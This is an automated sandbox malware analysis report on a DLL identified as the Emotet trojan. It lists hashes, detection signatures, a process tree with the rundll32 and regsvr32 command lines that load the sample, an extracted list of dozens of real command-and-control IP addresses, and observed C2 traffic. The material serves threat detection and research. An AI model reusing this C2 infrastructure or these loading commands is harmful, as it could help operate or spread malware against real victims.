Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
9818t9ks1s

Overview

General Information

Sample Name:9818t9ks1s (renamed file extension from none to dll)
Analysis ID:669370
MD5:83418a9af56db91ff2c78c4b2b9d62f8
SHA1:0ea68aab3721e509ce0b1bff7e574eda037798be
SHA256:4a688f571024b08f9793559427d8692471f5aa715882899c631c3052eac7c6a1
Tags:32dllexetrojan
Infos:

Detection

Emotet
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Antivirus / Scanner detection for submitted sample
Yara detected Emotet
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Snort IDS alert for network traffic
Machine Learning detection for sample
C2 URLs / IPs found in malware configuration
Hides that the sample has been downloaded from the Internet (zone.identifier)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Contains functionality to query locales information (e.g. system language)
Deletes files inside the Windows folder
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Program does not show much activity (idle)
IP address seen in connection with other malware
PE file contains strange resources
Tries to load missing DLLs
Drops PE files to the windows directory (C:\Windows)
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Connects to several IPs in different countries
Potential key logger detected (key state polling based)
Registers a DLL
Queries disk information (often used to detect virtual machines)
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 6888 cmdline: loaddll32.exe "C:\Users\user\Desktop\9818t9ks1s.dll" MD5: 7DEB5DB86C0AC789123DEC286286B938)
    • cmd.exe (PID: 6896 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\9818t9ks1s.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 6924 cmdline: rundll32.exe "C:\Users\user\Desktop\9818t9ks1s.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • regsvr32.exe (PID: 6912 cmdline: regsvr32.exe /s C:\Users\user\Desktop\9818t9ks1s.dll MD5: 426E7499F6A7346F0410DEAD0805586B)
      • regsvr32.exe (PID: 7020 cmdline: C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Bvqee\qeggfkimakwygr.che" MD5: 426E7499F6A7346F0410DEAD0805586B)
    • rundll32.exe (PID: 6932 cmdline: rundll32.exe C:\Users\user\Desktop\9818t9ks1s.dll,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 7040 cmdline: rundll32.exe C:\Users\user\Desktop\9818t9ks1s.dll,DllUnregisterServerr MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • svchost.exe (PID: 5084 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6324 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6576 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 3952 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 7028 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5748 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

Threatname: Emotet

{"C2 list": ["51.91.7.5:8080", "197.242.150.244:8080", "1.234.2.232:8080", "173.212.193.249:8080", "51.91.76.89:8080", "151.106.112.196:8080", "107.182.225.142:8080", "103.43.46.182:443", "195.201.151.129:8080", "51.254.140.238:7080", "153.126.146.25:7080", "176.56.128.118:443", "188.44.20.25:443", "119.193.124.41:7080", "70.36.102.35:443", "45.142.114.231:8080", "46.55.222.11:443", "82.165.152.127:8080", "212.237.17.99:8080", "92.240.254.110:8080", "217.182.25.250:8080", "189.126.111.200:7080", "212.24.98.99:8080", "45.176.232.124:443", "192.99.251.50:443", "216.158.226.206:443", "206.188.212.92:8080", "176.104.106.96:8080", "159.65.88.10:8080", "138.185.72.26:8080", "203.114.109.124:443", "103.75.201.2:443", "1.234.21.73:7080", "209.126.98.206:8080", "50.30.40.196:8080", "209.250.246.206:443", "178.79.147.66:8080", "50.116.54.215:443", "185.8.212.130:7080", "31.24.158.56:8080", "146.59.226.45:443", "72.15.201.15:8080", "110.232.117.186:8080", "5.9.116.246:8080", "185.157.82.211:8080", "129.232.188.93:443", "158.69.222.101:443", "164.68.99.3:8080", "45.118.135.203:7080", "101.50.0.91:8080", "195.154.133.20:443", "196.218.30.83:443", "45.118.115.99:8080", "167.99.115.35:8080", "79.172.212.216:8080", "159.8.59.82:8080"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.440856153.00000000049E1000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
    00000002.00000002.440856153.00000000049E1000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
      00000003.00000002.438019180.00000000049F1000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
        00000003.00000002.438019180.00000000049F1000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
          00000002.00000002.440822056.00000000049B0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
            Click to see the 11 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            2.2.regsvr32.exe.49b0000.0.raw.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
              2.2.regsvr32.exe.49b0000.0.raw.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                4.2.rundll32.exe.4290000.0.raw.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                  4.2.rundll32.exe.4290000.0.raw.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                    5.2.regsvr32.exe.4c70000.0.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                      Click to see the 19 entries

                      Sigma Signatures

                      No Sigma rule has matched

                      Snort Signatures

                      Timestamp:192.168.2.5119.193.124.414982270802404304 07/20/22-01:07:10.809694
                      SID:2404304
                      Source Port:49822
                      Destination Port:7080
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:192.168.2.551.91.76.894981180802404338 07/20/22-01:07:08.508000
                      SID:2404338
                      Source Port:49811
                      Destination Port:8080
                      Protocol:TCP
                      Classtype:A Network Trojan was detected

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Multi AV Scanner detection for submitted file
                      Source: 9818t9ks1s.dllVirustotal: Detection: 69%Perma Link
                      Antivirus / Scanner detection for submitted sample
                      Source: 9818t9ks1s.dllAvira: detected
                      Antivirus detection for URL or domain
                      Source: https://70.36.102.35/vAvira URL Cloud: Label: malware
                      Source: https://70.36.102.35/gVsYreJaRCTZGAqrRgMzhhpqBeNQdFAvira URL Cloud: Label: malware
                      Source: https://70.36.102.35/Avira URL Cloud: Label: malware
                      Source: https://70.36.102.35/gVsYreJaRCTZGAqrRgMzhhpqBeNQdTAvira URL Cloud: Label: malware
                      Source: https://70.36.102.35/gVsYreJaRCTZGAqrRgMzhhpqBeNQdAvira URL Cloud: Label: malware
                      Multi AV Scanner detection for domain / URL
                      Source: https://70.36.102.35/Virustotal: Detection: 13%Perma Link
                      Machine Learning detection for sample
                      Source: 9818t9ks1s.dllJoe Sandbox ML: detected
                      Source: 00000005.00000002.953841049.00000000032E6000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Emotet {"C2 list": ["51.91.7.5:8080", "197.242.150.244:8080", "1.234.2.232:8080", "173.212.193.249:8080", "51.91.76.89:8080", "151.106.112.196:8080", "107.182.225.142:8080", "103.43.46.182:443", "195.201.151.129:8080", "51.254.140.238:7080", "153.126.146.25:7080", "176.56.128.118:443", "188.44.20.25:443", "119.193.124.41:7080", "70.36.102.35:443", "45.142.114.231:8080", "46.55.222.11:443", "82.165.152.127:8080", "212.237.17.99:8080", "92.240.254.110:8080", "217.182.25.250:8080", "189.126.111.200:7080", "212.24.98.99:8080", "45.176.232.124:443", "192.99.251.50:443", "216.158.226.206:443", "206.188.212.92:8080", "176.104.106.96:8080", "159.65.88.10:8080", "138.185.72.26:8080", "203.114.109.124:443", "103.75.201.2:443", "1.234.21.73:7080", "209.126.98.206:8080", "50.30.40.196:8080", "209.250.246.206:443", "178.79.147.66:8080", "50.116.54.215:443", "185.8.212.130:7080", "31.24.158.56:8080", "146.59.226.45:443", "72.15.201.15:8080", "110.232.117.186:8080", "5.9.116.246:8080", "185.157.82.211:8080", "129.232.188.93:443", "158.69.222.101:443", "164.68.99.3:8080", "45.118.135.203:7080", "101.50.0.91:8080", "195.154.133.20:443", "196.218.30.83:443", "45.118.115.99:8080", "167.99.115.35:8080", "79.172.212.216:8080", "159.8.59.82:8080"]}
                      Source: 9818t9ks1s.dllStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DLL
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_1002592C __EH_prolog,GetFullPathNameA,lstrcpynA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,lstrcpyA,2_2_1002592C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1002592C __EH_prolog,GetFullPathNameA,lstrcpynA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,lstrcpyA,3_2_1002592C

                      Networking

                      barindex
                      System process connects to network (likely due to code injection or exploit)
                      Source: C:\Windows\SysWOW64\regsvr32.exeNetwork Connect: 217.182.25.250 8080Jump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exeNetwork Connect: 70.36.102.35 443Jump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exeNetwork Connect: 51.91.76.89 8080Jump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exeNetwork Connect: 119.193.124.41 7080Jump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exeNetwork Connect: 92.240.254.110 8080Jump to behavior
                      Snort IDS alert for network traffic
                      Source: TrafficSnort IDS: 2404338 ET CNC Feodo Tracker Reported CnC Server TCP group 20 192.168.2.5:49811 -> 51.91.76.89:8080
                      Source: TrafficSnort IDS: 2404304 ET CNC Feodo Tracker Reported CnC Server TCP group 3 192.168.2.5:49822 -> 119.193.124.41:7080
                      C2 URLs / IPs found in malware configuration
                      Source: Malware configuration extractorIPs: 51.91.7.5:8080
                      Source: Malware configuration extractorIPs: 197.242.150.244:8080
                      Source: Malware configuration extractorIPs: 1.234.2.232:8080
                      Source: Malware configuration extractorIPs: 173.212.193.249:8080
                      Source: Malware configuration extractorIPs: 51.91.76.89:8080
                      Source: Malware configuration extractorIPs: 151.106.112.196:8080
                      Source: Malware configuration extractorIPs: 107.182.225.142:8080
                      Source: Malware configuration extractorIPs: 103.43.46.182:443
                      Source: Malware configuration extractorIPs: 195.201.151.129:8080
                      Source: Malware configuration extractorIPs: 51.254.140.238:7080
                      Source: Malware configuration extractorIPs: 153.126.146.25:7080
                      Source: Malware configuration extractorIPs: 176.56.128.118:443
                      Source: Malware configuration extractorIPs: 188.44.20.25:443
                      Source: Malware configuration extractorIPs: 119.193.124.41:7080
                      Source: Malware configuration extractorIPs: 70.36.102.35:443
                      Source: Malware configuration extractorIPs: 45.142.114.231:8080
                      Source: Malware configuration extractorIPs: 46.55.222.11:443
                      Source: Malware configuration extractorIPs: 82.165.152.127:8080
                      Source: Malware configuration extractorIPs: 212.237.17.99:8080
                      Source: Malware configuration extractorIPs: 92.240.254.110:8080
                      Source: Malware configuration extractorIPs: 217.182.25.250:8080
                      Source: Malware configuration extractorIPs: 189.126.111.200:7080
                      Source: Malware configuration extractorIPs: 212.24.98.99:8080
                      Source: Malware configuration extractorIPs: 45.176.232.124:443
                      Source: Malware configuration extractorIPs: 192.99.251.50:443
                      Source: Malware configuration extractorIPs: 216.158.226.206:443
                      Source: Malware configuration extractorIPs: 206.188.212.92:8080
                      Source: Malware configuration extractorIPs: 176.104.106.96:8080
                      Source: Malware configuration extractorIPs: 159.65.88.10:8080
                      Source: Malware configuration extractorIPs: 138.185.72.26:8080
                      Source: Malware configuration extractorIPs: 203.114.109.124:443
                      Source: Malware configuration extractorIPs: 103.75.201.2:443
                      Source: Malware configuration extractorIPs: 1.234.21.73:7080
                      Source: Malware configuration extractorIPs: 209.126.98.206:8080
                      Source: Malware configuration extractorIPs: 50.30.40.196:8080
                      Source: Malware configuration extractorIPs: 209.250.246.206:443
                      Source: Malware configuration extractorIPs: 178.79.147.66:8080
                      Source: Malware configuration extractorIPs: 50.116.54.215:443
                      Source: Malware configuration extractorIPs: 185.8.212.130:7080
                      Source: Malware configuration extractorIPs: 31.24.158.56:8080
                      Source: Malware configuration extractorIPs: 146.59.226.45:443
                      Source: Malware configuration extractorIPs: 72.15.201.15:8080
                      Source: Malware configuration extractorIPs: 110.232.117.186:8080
                      Source: Malware configuration extractorIPs: 5.9.116.246:8080
                      Source: Malware configuration extractorIPs: 185.157.82.211:8080
                      Source: Malware configuration extractorIPs: 129.232.188.93:443
                      Source: Malware configuration extractorIPs: 158.69.222.101:443
                      Source: Malware configuration extractorIPs: 164.68.99.3:8080
                      Source: Malware configuration extractorIPs: 45.118.135.203:7080
                      Source: Malware configuration extractorIPs: 101.50.0.91:8080
                      Source: Malware configuration extractorIPs: 195.154.133.20:443
                      Source: Malware configuration extractorIPs: 196.218.30.83:443
                      Source: Malware configuration extractorIPs: 45.118.115.99:8080
                      Source: Malware configuration extractorIPs: 167.99.115.35:8080
                      Source: Malware configuration extractorIPs: 79.172.212.216:8080
                      Source: Malware configuration extractorIPs: 159.8.59.82:8080
                      Source: Joe Sandbox ViewASN Name: OVHFR OVHFR
                      Source: Joe Sandbox ViewASN Name: PLUSSERVER-ASN1DE PLUSSERVER-ASN1DE
                      Source: Joe Sandbox ViewIP Address: 217.182.25.250 217.182.25.250
                      Source: global trafficTCP traffic: 192.168.2.5:49770 -> 92.240.254.110:8080
                      Source: global trafficTCP traffic: 192.168.2.5:49811 -> 51.91.76.89:8080
                      Source: global trafficTCP traffic: 192.168.2.5:49817 -> 217.182.25.250:8080
                      Source: global trafficTCP traffic: 192.168.2.5:49822 -> 119.193.124.41:7080
                      Source: unknownNetwork traffic detected: IP country count 28
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
                      Source: unknownTCP traffic detected without corresponding DNS query: 70.36.102.35
                      Source: unknownTCP traffic detected without corresponding DNS query: 70.36.102.35
                      Source: unknownTCP traffic detected without corresponding DNS query: 70.36.102.35
                      Source: unknownTCP traffic detected without corresponding DNS query: 70.36.102.35
                      Source: unknownTCP traffic detected without corresponding DNS query: 70.36.102.35
                      Source: unknownTCP traffic detected without corresponding DNS query: 70.36.102.35
                      Source: unknownTCP traffic detected without corresponding DNS query: 70.36.102.35
                      Source: unknownTCP traffic detected without corresponding DNS query: 70.36.102.35
                      Source: unknownTCP traffic detected without corresponding DNS query: 70.36.102.35
                      Source: unknownTCP traffic detected without corresponding DNS query: 70.36.102.35
                      Source: unknownTCP traffic detected without corresponding DNS query: 92.240.254.110
                      Source: unknownTCP traffic detected without corresponding DNS query: 92.240.254.110
                      Source: unknownTCP traffic detected without corresponding DNS query: 92.240.254.110
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.91.76.89
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.91.76.89
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.91.76.89
                      Source: unknownTCP traffic detected without corresponding DNS query: 217.182.25.250
                      Source: unknownTCP traffic detected without corresponding DNS query: 217.182.25.250
                      Source: unknownTCP traffic detected without corresponding DNS query: 217.182.25.250
                      Source: unknownTCP traffic detected without corresponding DNS query: 119.193.124.41
                      Source: unknownTCP traffic detected without corresponding DNS query: 119.193.124.41
                      Source: unknownTCP traffic detected without corresponding DNS query: 119.193.124.41
                      Source: unknownTCP traffic detected without corresponding DNS query: 119.193.124.41
                      Source: unknownTCP traffic detected without corresponding DNS query: 119.193.124.41
                      Source: unknownTCP traffic detected without corresponding DNS query: 119.193.124.41
                      Source: unknownTCP traffic detected without corresponding DNS query: 119.193.124.41
                      Source: unknownTCP traffic detected without corresponding DNS query: 119.193.124.41
                      Source: unknownTCP traffic detected without corresponding DNS query: 119.193.124.41
                      Source: unknownTCP traffic detected without corresponding DNS query: 119.193.124.41
                      Source: unknownTCP traffic detected without corresponding DNS query: 119.193.124.41
                      Source: svchost.exe, 00000018.00000003.636242685.000002554B96E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000018.00000003.636284410.000002554B96E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000018.00000003.636264427.000002554B96E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000018.00000003.636298329.000002554B96E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000018.00000003.636333190.000002554B96E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000018.00000003.636344572.000002554B96E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000018.00000003.636370804.000002554B96E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000018.00000003.636357149.000002554B96E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000018.00000003.636166889.000002554B96E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000018.00000003.636188041.000002554B96E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000018.00000003.636224370.000002554B96E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000018.00000003.636314319.000002554B96E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG", equals www.facebook.com (Facebook)
                      Source: svchost.exe, 00000018.00000003.636242685.000002554B96E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000018.00000003.636284410.000002554B96E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000018.00000003.636264427.000002554B96E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000018.00000003.636298329.000002554B96E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000018.00000003.636333190.000002554B96E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000018.00000003.636344572.000002554B96E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000018.00000003.636370804.000002554B96E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000018.00000003.636357149.000002554B96E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000018.00000003.636166889.000002554B96E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000018.00000003.636188041.000002554B96E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000018.00000003.636224370.000002554B96E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000018.00000003.636314319.000002554B96E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG", equals www.twitter.com (Twitter)
                      Source: svchost.exe, 00000018.00000003.636242685.000002554B96E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000018.00000003.636284410.000002554B96E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000018.00000003.636264427.000002554B96E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000018.00000003.636298329.000002554B96E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000018.00000003.636333190.000002554B96E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000018.00000003.636344572.000002554B96E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000018.00000003.636370804.000002554B96E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000018.00000003.636357149.000002554B96E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000018.00000003.636166889.000002554B96E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000018.00000003.636188041.000002554B96E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000018.00000003.637100433.000002554B971000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000018.00000003.636016846.000002554B981000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000018.00000003.636224370.000002554B96E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000018.00000003.636314319.000002554B96E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2022-07-11T16:37:37.4991749Z||.||58dfb4d5-be7e-424e-8739-cac99224843f||1152921505695035586||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailab
